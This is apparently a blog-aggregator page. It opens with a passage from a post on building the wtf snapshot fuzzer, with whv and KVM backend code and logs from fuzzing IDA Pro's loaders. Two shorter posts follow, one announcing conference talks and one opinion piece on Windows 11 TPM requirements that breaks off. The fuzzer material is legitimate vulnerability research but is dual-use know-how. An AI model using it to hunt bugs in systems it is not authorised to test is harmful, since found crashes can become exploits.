wtf.exe run --name hevd --backend whv --state targets\hevd\state --runs=100000 --input targets\hevd\crashes\crash-0xfffff764b91c0000-0x0-0xffffbf84fb10e780-0x2-0x0

vtune

This report is really catastrophic because it means we spend twice as much time dealing with memory access faults than actually running target code. Handling memory access faults should take very little time. If anybody knows their way around whv & performance it'd be great to reach out because I really have no idea why it is that slow.

The birth of hope

After tons of work, I could finally execute the ELF loader from start to end and see the messages you would see in the output window. In the below, you can see IDA loading the elf64.dll loader then initializes the database as well as the btree. Then, it loads up processor modules, creates segments, processes relocations, and finally loads the dwarf modules to parse debug information:

>wtf.exe run --name ida64-elf75 --backend whv --state state --input ntfs-3g
Initializing the debugger instance.. (this takes a bit of time)
Parsing coverage\dwarf64.cov..
Parsing coverage\elf64.cov..
Parsing coverage\libdwarf.cov..
Applied 43624 code coverage breakpoints
[...]
Running ntfs-3g
[...]
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\loaders\elf64.dll)
ida64: ida64!msg(format="Possible file format: %s (%s) ", ...)
ida64: ELF64 for x86-64 (Shared object) - ELF64 for x86-64 (Shared object)
[...]
ida64: ida64!msg(format="   bytes   pages size description --------- ----- ---- -------------------------------------------- %9lu %5u %4u allocating memory for b-tree... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for virtual array... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for name pointers... ----------------------------------------------------------------- %9u
total memory allocated  ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k064.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k0s64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\ad218x64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\alpha64.dll)
[...]
ida64: ida64!msg(format="Loading file '%s' into database... Detected file format: %s ", ...)
ida64: ida64!msg(format="Loading processor module %s for %s...", ...)
ida64: ida64!msg(format="Initializing processor module %s...", ...)
ida64: ida64!msg(format="OK ", ...)
ida64: ida64!mbox(format="@0:1139[] Can't use BIOS comments base.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: ida64!msg(format="Autoanalysis subsystem has been initialized. ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
[...]
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Reading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Loading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="", ...)
ida64: ida64!msg(format="Processing relocations... ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!mbox(format="Unexpected entries in the PLT stub. The file might have been modified after linking.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: Unexpected entries in the PLT stub.
The file might have been modified after linking.
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
[...]
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dbg64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dwarf64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\libdwarf.dll)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="Plugin "%s" not found ", ...)
ida64: Hit the end of load file :o

Need for speed: whv backend

At this point, I was able to fuzz IDA but the speed was incredibly slow. I could execute about 0.01 test cases per second. It was really cool to see it working, finding new code coverage, etc. but I felt I wouldn't find much at this speed. That's why I decided to look at using whv to implement an execution backend.

I had played around with whv before with pywinhv so I knew the features offered by the API well. As this was the first execution backend using virtualization I had to rethink a bunch of the fundamentals.

Code coverage

What I settled for is to use one-time software breakpoints at the beginning of basic blocks. The user simply needs to generate a list of breakpoint addresses into a JSON file and wtf consumes this file during initialization. This means that the user can selectively pick the modules that it wants coverage for.

It is annoying though because it means you need to throw those modules in IDA and generate the JSON file for each of them. The script I use for that is available here: gen_coveragefile_ida.py. You could obviously generate the file yourself via other tools.

Overall I think it is a good enough tradeoff. I did try to play with more creative & esoteric ways to acquire code coverage though. Filling the address space with int3s and lazily populating code leveraging a length-disassembler engine to know the size of instructions. I loved this idea but I ran into tons of problems with switch tables that embed data in code sections. This means that wtf corrupts them when setting software breakpoints which leads to a bunch of spectacular crashes a little bit everywhere in the system, so I abandoned this idea. The trap flag was awfully slow and whv doesn't expose the Monitor Trap Flag.

The ideal for me would be to find a way to conserve the performance and acquire code coverage without knowing anything about the target, like in bochscpu.

Dirty memory

The other thing that I needed was to be able to track dirty memory. whv provides WHvQueryGpaRangeDirtyBitmap to do just that which was perfect.

Tracing

One thing that I would have loved was to be able to generate execution traces like with bochscpu. I initially thought I'd be able to mirror this functionality using the trap flag. If you turn on the trap flag, let's say a syscall instruction, the fault gets raised after the instruction and so you miss the entire kernel side executing. I discovered that this is due to how syscall is implemented: it masks RFLAGS with the IA32_FMASK MSR stripping away the trap flag. After programming IA32_FMASK myself I could trace through syscalls which was great. By comparing traces generated by the two backends, I noticed that the whv trace was missing page faults. This is basically another instance of the same problem: when an interruption happens the CPU saves the current context and loads a new one from the task segment which doesn't have the trap flag. I can't remember if I got that working or if this turned out to be harder than it looked but I ended up reverting the code and settled for only generating code coverage traces. It is definitely something I would love to revisit in the future.

Timeout

To protect the fuzzer against infinite loops and to limit the execution time, I use a timer to tell the virtual processor to stop execution. This is also not as good as what bochscpu offered us because not as precise but that's the only solution I could come up with:

class TimerQ_t {
  HANDLE TimerQueue_ = nullptr;
  HANDLE LastTimer_ = nullptr;

  static void CALLBACK AlarmHandler(PVOID, BOOLEAN) {
    reinterpret_cast<WhvBackend_t *>(g_Backend)->CancelRunVirtualProcessor();
  }

public:
  ~TimerQ_t() {
    if (TimerQueue_) {
      DeleteTimerQueueEx(TimerQueue_, nullptr);
    }
  }

  TimerQ_t() = default;
  TimerQ_t(const TimerQ_t &) = delete;
  TimerQ_t &operator=(const TimerQ_t &) = delete;

  void SetTimer(const uint32_t Seconds) {
    if (Seconds == 0) {
      return;
    }

    if (!TimerQueue_) {
      TimerQueue_ = CreateTimerQueue();
      if (!TimerQueue_) {
        fmt::print("CreateTimerQueue failed.\n");
        exit(1);
      }
    }

    if (!CreateTimerQueueTimer(&LastTimer_, TimerQueue_, AlarmHandler,
                                nullptr, Seconds * 1000, Seconds * 1000, 0)) {
      fmt::print("CreateTimerQueueTimer failed.\n");
      exit(1);
    }
  }

  void TerminateLastTimer() {
    DeleteTimerQueueTimer(TimerQueue_, LastTimer_, nullptr);
  }
};

Inserting page faults

To be able to insert a page fault into the guest I use the WHvRegisterPendingEvent register and a WHvX64PendingEventException event type:

bool WhvBackend_t::PageFaultsMemoryIfNeeded(const Gva_t Gva,
                                            const uint64_t Size) {
  const Gva_t PageToFault = GetFirstVirtualPageToFault(Gva, Size);

  //
  // If we haven't found any GVA to fault-in then we have no job to do so we
  // return.
  //

  if (PageToFault == Gva_t(0xffffffffffffffff)) {
    return false;
  }

  WhvDebugPrint("Inserting page fault for GVA {:#x}\n", PageToFault);

  // cf 'VM-Entry Controls for Event Injection' in Intel 3C
  WHV_REGISTER_VALUE_t Exception;
  Exception->ExceptionEvent.EventPending = 1;
  Exception->ExceptionEvent.EventType = WHvX64PendingEventException;
  Exception->ExceptionEvent.DeliverErrorCode = 1;
  Exception->ExceptionEvent.Vector = WHvX64ExceptionTypePageFault;
  Exception->ExceptionEvent.ErrorCode = ErrorWrite | ErrorUser;
  Exception->ExceptionEvent.ExceptionParameter = PageToFault.U64();

  if (FAILED(SetRegister(WHvRegisterPendingEvent, &Exception))) {
    __debugbreak();
  }

  return true;
}

Determinism

The last feature that I wanted was to try to get as much determinism as I could. After tracing a bunch of executions I realized nt!ExGenRandom uses rdrand in the Windows kernel and this was a big source of non-determinism in executions. Intel does support generating vmexit when the instruction is called but this is also not exposed by whv.

I settled for a breakpoint on the function and emulate its behavior with a deterministic implementation:

//
// Make ExGenRandom deterministic.
//
// kd> ub fffff805`3b8287c4 l1
// nt!ExGenRandom+0xe0:
// fffff805`3b8287c0 480fc7f2        rdrand  rdx
const Gva_t ExGenRandom = Gva_t(g_Dbg.GetSymbol("nt!ExGenRandom") + 0xe4);
if (!g_Backend->SetBreakpoint(ExGenRandom, [](Backend_t *Backend) {
      DebugPrint("Hit ExGenRandom!\n");
      Backend->Rdx(Backend->Rdrand());
    })) {
  return false;
}

I am not a huge fan of this solution because it means you need to know where non-determinism is coming from which is usually hard to figure out in the first place. Another source of non-determinism is the timestamp counter. As far as I can tell, this hasn't led to any major issues though but this might bite us in the future.

With the above implemented, I was able to run test cases through the backend end to end which was great. Below I describe some of the problems I solved while testing it.

Problem 6: Code coverage breakpoints not free

Profiling wtf revealed that my code coverage breakpoints that I thought free were not quite that free. The theory is that they are one-time breakpoints and as a result, you pay for their cost only once. This leads to a warm-up cost that you pay at the start of the run as the fuzzer is discovering sections of code highly reachable. But if you look at it over time, it should become free.

The problem in my implementation was in the code used to restore those breakpoints after executing a test case. I tracked the code coverage breakpoints that haven't been hit in a list. When restoring, I would start by restoring every dirty page and I would iterate through this list to reset the code-coverage breakpoints. It turns out this was highly inefficient when you have hundreds of thousands of breakpoints.

I did what you usually do when you have a performance problem: I traded CPU time for memory. The answer to this problem is the Ram_t class. The way it works is that every time you add a code coverage breakpoint, it duplicates the page and sets a breakpoint in this page as well as the guest RAM.

//
// Add a breakpoint to a GPA.
//

uint8_t *AddBreakpoint(const Gpa_t Gpa) {
  const Gpa_t AlignedGpa = Gpa.Align();
  uint8_t *Page = nullptr;

  //
  // Grab the page if we have it in the cache
  //

  if (Cache_.contains(Gpa.Align())) {
    Page = Cache_.at(AlignedGpa);
  }

  //
  // Or allocate and initialize one!
  //

  else {
    Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
    if (Page == nullptr) {
      fmt::print("Failed to call aligned_alloc.\n");
      return nullptr;
    }

    const uint8_t *Virgin =
        Dmp_.GetPhysicalPage(AlignedGpa.U64()) + AlignedGpa.Offset().U64();
    if (Virgin == nullptr) {
      fmt::print(
          "The dump does not have a page backing GPA {:#x}, exiting.\n",
          AlignedGpa);
      return nullptr;
    }

    memcpy(Page, Virgin, Page::Size);
  }

  //
  // Apply the breakpoint.
  //

  const uint64_t Offset = Gpa.Offset().U64();
  Page[Offset] = 0xcc;
  Cache_.emplace(AlignedGpa, Page);

  //
  // And also update the RAM.
  //

  Ram_[Gpa.U64()] = 0xcc;
  return &Page[Offset];
}

When a code coverage breakpoint is hit, the class removes the breakpoint from both of those locations.

//
// Remove a breakpoint from a GPA.
//

void RemoveBreakpoint(const Gpa_t Gpa) {
  const uint8_t *Virgin = GetHvaFromDump(Gpa);
  uint8_t *Cache = GetHvaFromCache(Gpa);

  //
  // Update the RAM.
  //

  Ram_[Gpa.U64()] = *Virgin;

  //
  // Update the cache. We assume that an entry is available in the cache.
  //

  *Cache = *Virgin;
}

When you restore dirty memory, you simply iterate through the dirty page and ask the Ram_t class to restore the content of this page. Internally, the class checks if the page has been duplicated and if so it restores from this copy. If it doesn't have, it restores the content from the dump file. This lets us restore code coverage breakpoints at extra memory costs:

//
// Restore a GPA from the cache or from the dump file if no entry is
// available in the cache.
//

const uint8_t *Restore(const Gpa_t Gpa) {
  //
  // Get the HVA for the page we want to restore.
  //

  const uint8_t *SrcHva = GetHva(Gpa);

  //
  // Get the HVA for the page in RAM.
  //

  uint8_t *DstHva = Ram_ + Gpa.Align().U64();

  //
  // It is possible for a GPA to not exist in our cache and in the dump file.
  // For this to make sense, you have to remember that the crash-dump does not
  // contain the whole amount of RAM. In which case, the guest OS can decide
  // to allocate new memory backed by physical pages that were not dumped
  // because not currently used by the OS.
  //
  // When this happens, we simply zero initialize the page as.. this is
  // basically the best we can do. The hope is that if this behavior is not
  // correct, the rest of the execution simply explodes pretty fast.
  //

  if (!SrcHva) {
    memset(DstHva, 0, Page::Size);
  }

  //
  // Otherwise, this is straight forward, we restore the source into the
  // destination. If we had a copy, then that is what we are writing to the
  // destination, and if we didn't have a copy then we are restoring the
  // content from the crash-dump.
  //

  else {
    memcpy(DstHva, SrcHva, Page::Size);
  }

  //
  // Return the HVA to the user in case it needs to know about it.
  //

  return DstHva;
}

Problem 7: Code coverage with IDA

I mentioned above that I was using IDA to generate the list of code coverage breakpoints that wtf needed. At first, I thought this was a bulletproof technique but I encountered a pretty annoying bug where IDA was tagging switch-tables as code instead of data. This leads to wtf corrupting switch-tables with cc's and it led to the guest crashing in spectacular ways.

I haven't run into this bug with the latest version of IDA yet which was nice.

Problem 8: Rounds of optimization

After profiling the fuzzer, I noticed that WHvQueryGpaRangeDirtyBitmap was extremely slow for unknown reasons.

To fix this, I ended up emulating the feature by mapping memory as read / execute in the EPT and track dirtiness when receiving a memory fault doing a write.

HRESULT
WhvBackend_t::OnExitReasonMemoryAccess(
    const WHV_RUN_VP_EXIT_CONTEXT &Exception) {
  const Gpa_t Gpa = Gpa_t(Exception.MemoryAccess.Gpa);
  const bool WriteAccess =
      Exception.MemoryAccess.AccessInfo.AccessType == WHvMemoryAccessWrite;

  if (!WriteAccess) {
    fmt::print("Dont know how to handle this fault, exiting.\n");
    __debugbreak();
    return E_FAIL;
  }

  //
  // Remap the page as writeable.
  //

  const WHV_MAP_GPA_RANGE_FLAGS Flags = WHvMapGpaRangeFlagWrite |
                                        WHvMapGpaRangeFlagRead |
                                        WHvMapGpaRangeFlagExecute;

  const Gpa_t AlignedGpa = Gpa.Align();
  DirtyGpa(AlignedGpa);

  uint8_t *AlignedHva = PhysTranslate(AlignedGpa);
  return MapGpaRange(AlignedHva, AlignedGpa, Page::Size, Flags);
}

Once fixed, I noticed that WHvTranslateGva also was slower than I expected. This is why I also emulated its behavior by walking the page tables myself:

HRESULT
WhvBackend_t::TranslateGva(const Gva_t Gva, const WHV_TRANSLATE_GVA_FLAGS,
                           WHV_TRANSLATE_GVA_RESULT &TranslationResult,
                           Gpa_t &Gpa) const {

  //
  // Stole most of the logic from @yrp604's code so thx bro.
  //

  const VIRTUAL_ADDRESS GuestAddress = Gva.U64();
  const MMPTE_HARDWARE Pml4 = GetReg64(WHvX64RegisterCr3);
  const uint64_t Pml4Base = Pml4.PageFrameNumber * Page::Size;
  const Gpa_t Pml4eGpa = Gpa_t(Pml4Base + GuestAddress.Pml4Index * 8);
  const MMPTE_HARDWARE Pml4e = PhysRead8(Pml4eGpa);
  if (!Pml4e.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  const uint64_t PdptBase = Pml4e.PageFrameNumber * Page::Size;
  const Gpa_t PdpteGpa = Gpa_t(PdptBase + GuestAddress.PdPtIndex * 8);
  const MMPTE_HARDWARE Pdpte = PhysRead8(PdpteGpa);
  if (!Pdpte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // huge pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // directory; see Table 4-1
  //

  const uint64_t PdBase = Pdpte.PageFrameNumber * Page::Size;
  if (Pdpte.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PdBase + (Gva.U64() & 0x3fff'ffff));
    return S_OK;
  }

  const Gpa_t PdeGpa = Gpa_t(PdBase + GuestAddress.PdIndex * 8);
  const MMPTE_HARDWARE Pde = PhysRead8(PdeGpa);
  if (!Pde.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // large pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // table; see Table 4-18
  //

  const uint64_t PtBase = Pde.PageFrameNumber * Page::Size;
  if (Pde.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PtBase + (Gva.U64() & 0x1f'ffff));
    return S_OK;
  }

  const Gpa_t PteGpa = Gpa_t(PtBase + GuestAddress.PtIndex * 8);
  const MMPTE_HARDWARE Pte = PhysRead8(PteGpa);
  if (!Pte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
  const uint64_t PageBase = Pte.PageFrameNumber * 0x1000;
  Gpa = Gpa_t(PageBase + GuestAddress.Offset);
  return S_OK;
}

Collecting dividends

Comparing the two backends, whv showed about 15x better performance over bochscpu. I honestly was a bit disappointed as I expected more of a 100x performance increase but I guess it was still a significant perf increase:

bochscpu:
#1 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 0.0s crash: 0 timeout: 0 cr3: 0
#2 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 12.0s crash: 0 timeout: 0 cr3: 0
#3 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 25.0s crash: 0 timeout: 0 cr3: 0
#4 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 38.0s crash: 0 timeout: 0 cr3: 0

whv:
#12 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 6.0s crash: 0 timeout: 0 cr3: 0
#30 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 16.0s crash: 0 timeout: 0 cr3: 0
#48 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 27.0s crash: 0 timeout: 0 cr3: 0
#66 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 37.0s crash: 0 timeout: 0 cr3: 0
#84 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 47.0s crash: 0 timeout: 0 cr3: 0

The speed started to be good enough for me to run it overnight and discover my first few crashes which was exciting even though they were just interr.

2 fast 2 furious: KVM backend

I really wanted to start fuzzing IDA on some proper hardware. It was pretty clear that renting Windows machines in the cloud with nested virtualization enabled wasn't something widespread or cheap. On top of that, I was still disappointed by the performance of whv and so I was eager to see how battle-tested hypervisors like Xen or KVM would measure.

I didn't know anything about those VMM but I quickly discovered that KVM was available in the Linux kernel and that it exposed a user-mode API that resembled whv via /dev/kvm. This looked perfect because if it was similar enough to whv I could probably write a backend for it easily. The KVM API powers Firecracker that is a project creating micro vms to run various workloads in the cloud. I assumed that you would need rich features as well as good performance to be the foundation technology of this project.

KVM APIs worked very similarly to whv and as a result, I will not repeat the previous part. Instead, I will just walk you through some of the differences and things I enjoyed more with KVM.

GPRs available through shared-memory

To avoid sending an IOCTL every time you want the value of the guest GPR, KVM allows you to map a shared memory region with the kernel where the registers are laid out:

//
// Get the size of the shared kvm run structure.
//

VpMmapSize_ = ioctl(Kvm_, KVM_GET_VCPU_MMAP_SIZE, 0);
if (VpMmapSize_ < 0) {
  perror("Could not get the size of the shared memory region.");
  return false;
}

//
// Man says:
//   there is an implicit parameter block that can be obtained by mmap()'ing
//   the vcpu fd at offset 0, with the size given by KVM_GET_VCPU_MMAP_SIZE.
//

Run_ = (struct kvm_run *)mmap(nullptr, VpMmapSize_, PROT_READ | PROT_WRITE,
                              MAP_SHARED, Vp_, 0);
if (Run_ == nullptr) {
  perror("mmap VCPU_MMAP_SIZE");
  return false;
}

On-demand paging

Implementing on demand paging with KVM was very easy. It uses userfaultfd and so you can just start a thread that polls and that services the requests:

void KvmBackend_t::UffdThreadMain() {
  while (!UffdThreadStop_) {

    //
    // Set up the pool fd with the uffd fd.
    //

    struct pollfd PoolFd = {.fd = Uffd_, .events = POLLIN};

    int Res = poll(&PoolFd, 1, 6000);
    if (Res < 0) {

      //
      // Sometimes poll returns -EINTR when we are trying to kick off the CPU
      // out of KVM_RUN.
      //

      if (errno == EINTR) {
        fmt::print("Poll returned EINTR\n");
        continue;
      }

      perror("poll");
      exit(EXIT_FAILURE);
    }

    //
    // This is the timeout, so we loop around to have a chance to check for
    // UffdThreadStop_.
    //

    if (Res == 0) {
      continue;
    }

    //
    // You get the address of the access that triggered the missing page event
    // out of a struct uffd_msg that you read in the thread from the uffd. You
    // can supply as many pages as you want with UFFDIO_COPY or UFFDIO_ZEROPAGE.
    // Keep in mind that unless you used DONTWAKE then the first of any of those
    // IOCTLs wakes up the faulting thread.
    //

    struct uffd_msg UffdMsg;
    Res = read(Uffd_, &UffdMsg, sizeof(UffdMsg));
    if (Res < 0) {
      perror("read");
      exit(EXIT_FAILURE);
    }

    //
    // Let's ensure we are dealing with what we think we are dealing with.
    //

    if (Res != sizeof(UffdMsg) || UffdMsg.event != UFFD_EVENT_PAGEFAULT) {
      fmt::print("The uffdmsg or the type of event we received is unexpected, "
                 "bailing.");
      exit(EXIT_FAILURE);
    }

    //
    // Grab the HVA off the message.
    //

    const uint64_t Hva = UffdMsg.arg.pagefault.address;

    //
    // Compute the GPA from the HVA.
    //

    const Gpa_t Gpa = Gpa_t(Hva - uint64_t(Ram_.Hva()));

    //
    // Page it in.
    //

    RunStats_.UffdPages++;
    const uint8_t *Src = Ram_.GetHvaFromDump(Gpa);
    if (Src != nullptr) {
      const struct uffdio_copy UffdioCopy = {
          .dst = Hva,
          .src = uint64_t(Src),
          .len = Page::Size,
      };

      //
      // The primary ioctl to resolve userfaults is UFFDIO_COPY. That atomically
      // copies a page into the userfault registered range and wakes up the
      // blocked userfaults (unless uffdio_copy.mode & UFFDIO_COPY_MODE_DONTWAKE
      // is set). Other ioctl works similarly to UFFDIO_COPY. They’re atomic as
      // in guaranteeing that nothing can see an half copied page since it’ll
      // keep userfaulting until the copy has finished.
      //

      Res = ioctl(Uffd_, UFFDIO_COPY, &UffdioCopy);
      if (Res < 0) {
        perror("UFFDIO_COPY");
        exit(EXIT_FAILURE);
      }
    } else {
      const struct uffdio_zeropage UffdioZeroPage = {
          .range = {.start = Hva, .len = Page::Size}};

      Res = ioctl(Uffd_, UFFDIO_ZEROPAGE, &UffdioZeroPage);
      if (Res < 0) {
        perror("UFFDIO_ZEROPAGE");
        exit(EXIT_FAILURE);
      }
    }
  }
}

Timeout

Another cool thing is that KVM exposes the Performance Monitoring Unit to the guests if the hardware supports it. When the hardware supports it, I am able to program the PMU to trigger an interruption after an arbitrary number of retired instructions. This is useful because when MSR_IA32_FIXED_CTR0 overflows, it triggers a special interruption called a PMI that gets delivered via the vector 0xE of the CPU's IDT. To catch it, we simply break on hal!HalPerfInterrupt:

//
// This is to catch the PMI interrupt if performance counters are used to
// bound execution.
//

if (!g_Backend->SetBreakpoint("hal!HalpPerfInterrupt",
                              [](Backend_t *Backend) {
                                CrashDetectionPrint("Perf interrupt\n");
                                Backend->Stop(Timedout_t());
                              })) {
  fmt::print("Could not set a breakpoint on hal!HalpPerfInterrupt, but "
              "carrying on..\n");
}

To make it work you have to program the APIC a little bit and I remember struggling to get the interruption fired. I am still not 100% sure that I got the details fully right but the interruption triggered consistently during my tests and so I called it a day. I would also like to revisit this area in the future as there might be other features I could use for the fuzzer.

Problem 9: Running it in the cloud

The KVM backend development was done on a laptop in a Hyper-V VM with nested virtualization on. It worked great but it was not powerful and so I wanted to run it on real hardware. After shopping around, I realized that Amazon didn't have any offers that supported nested virtualization and that only Microsoft's Azure had available SKUs with nested virtualization on. I rented one of them to try it out and the hardware didn't support this VMX feature called unrestricted_guest. I can't quite remember why it mattered but it had to do with real mode & the APIC and the way I create memory slots. I had developed the backend assuming this feature would be here and so I didn't use Azure either.

Instead, I rented a bare-metal server on vultr for about 100$ / mo. The CPU was a Xeon E3-1270v6 processor, 4 cores, 8 threads @ 3.8GHz which seemed good enough for my usage. The hardware had a PMU and that is where I developed the support for it in wtf as well.

I was pretty happy because the fuzzer was running about 10x faster than whv. It is not a fair comparison because those numbers weren't acquired from the same hardware but still:

#123 cov: 25521 corp: 0 exec/s: 12.3 lastcov: 9.0s crash: 0 timeout: 0 cr3: 0
#252 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 19.0s crash: 0 timeout: 0 cr3: 0
#381 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 29.0s crash: 0 timeout: 0 cr3: 0
#510 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 39.0s crash: 0 timeout: 0 cr3: 0
#639 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 49.0s crash: 0 timeout: 0 cr3: 0
#768 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 59.0s crash: 0 timeout: 0 cr3: 0
#897 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 1.1min crash: 0 timeout: 0 cr3: 0

To give you more details, this test case used generated executions of around 195 millions instructions with the following stats (generated by bochscpu):

Run stats:
Instructions executed: 194593453 (260546 unique)
          Dirty pages: 9166848 bytes (0 MB)
      Memory accesses: 411196757 bytes (24 MB)

Problem 10: Minsetting a 1.6m files corpus

In parallel with coding wtf, I acquired a fairly large corpus made of the weirdest ELF possible. I built this corpus made of 1.6 million ELF files and I now needed to minset it. Because of the way I had architected wtf, minsetting was a serial process. I could have gone the AFL route and generate execution traces that eventually get merged together but I didn't like this idea either.

Instead, I re-architected wtf into a client and a server. The server owns the coverage, the corpus, and the mutator. It just distributes test cases to clients and receives code coverage reports from them. You can see the clients are runners that send back results to the server. All the important state is kept in the server.

This model was nice because it automatically meant that I could fully utilize the hardware I was renting to minset those files. As an example, minsetting this corpus of files with a single core would have probably taken weeks to complete but it took 8 hours with this new architecture:

#1972714 cov: 74065 corp: 3176 (58mb) exec/s: 64.2 (8 nodes) lastcov: 3.0s crash: 49 timeout: 71 cr3: 48 uptime: 8hr

Wrapping up

In this post we went through the birth of wtf which is a distributed, code-coverage guided, customizable, cross-platform snapshot-based fuzzer designed for attacking user and/or kernel-mode targets running on Microsoft Windows. It also led to writing and open-sourcing a number of other small projects: lockmem, inject, kdmp-parser and symbolizer.

We went from zero to dozens of unique crashes in various IDA components: libdwarf64.dll, dwarf64.dll, elf64.dll and pdb64.dll. The findings were really diverse: null-dereference, stack-overflows, division by zero, infinite loops, use-after-frees, and out-of-bounds accesses. I have compiled all of my findings in the following Github repository: fuzzing-ida75.

I probably fuzzed for an entire month but most of the crashes popped up in the first two weeks. According to lighthouse, I managed to cover about 80% of elf64.dll, 50% of dwarf64.dll and 26% of libdwarf64.dll with a minset of about 2.4k files for a total of 17MB.

Before signing out, I wanted to thank the IDA Hex-Rays team for handling & fixing my reports at an amazing speed. I would highly recommend for you to try out their bounty as I am sure there's a lot to be found.

Finally big up to my bros yrp604 & __x86 for proofreading this article.

pi3 blog
My talks @ BlackHat 2021 and DefCon29pi3
3 July 2021 at 20:59

My talks @ BlackHat 2021 and DefCon29

pi3 blog

By: pi3

3 July 2021 at 20:59

This year I’m going to present some amazing research on:

BlackHat 2021 – “Safeguarding UEFI Ecosystem: Firmware Supply Chain is Hard(coded)” – together with Alex Tereshkin and Alex Matrosov
Abstract: click here
DefCon 29 – “Glitching RISC-V chips: MTVEC corruption for hardening ISA” – together with Alex Matrosov
Abstract: click here

Both of them are really unusual and interesting topics

If anyone is going to be in Las Vegas during BlackHat and/or DefCon this year and would like to grab a beer, just let me know!

Thanks,
Adam

secret club
Windows 11: TPMs and Digital Sovereigntycan1357， daax， everdox
28 June 2021 at 00:00

Windows 11: TPMs and Digital Sovereignty

secret club

By: can1357， daax， everdox

28 June 2021 at 00:00

This article is an opinion held by a subset of members about the potential plan from Microsoft about their enforcement of a TPM to use Windows 11 and various features. This article will not go into great detail about all the good and bad of a TPM; there will be links at the end for you to continue your research, but it will go into the issues we see with enforcement. If you’re unfamiliar with what a TPM is or its general function we recommend taking a look at these links: What is a TPM?; TPM and Attestation.

As you may or may not have already noticed, many people are wondering about Microsoft’s new mandatory TPM 2.0 hardware requirement for Windows 11. If you look around the press releases, shallow technical documentation, and the myriad of buzzwords like “security,” “device health,” “firmware vulnerabilities,” and “malware,” you still haven’t received a straightforward answer as to why exactly you need this tech.

Part of system requirements from Microsoft

Many of you reading this article may have machines around the house or office you built from silicon that isn’t even seven years old. These still play today’s latest games without hiccup or issue, and unless you let your Grandma or 6-year old nephew on the machine recently, you likely don’t have malware either.

So, why do I suddenly need a TPM 2.0 device on my machine, then you ask? Well, the answer is quite simple. It’s not about you; it’s about them.

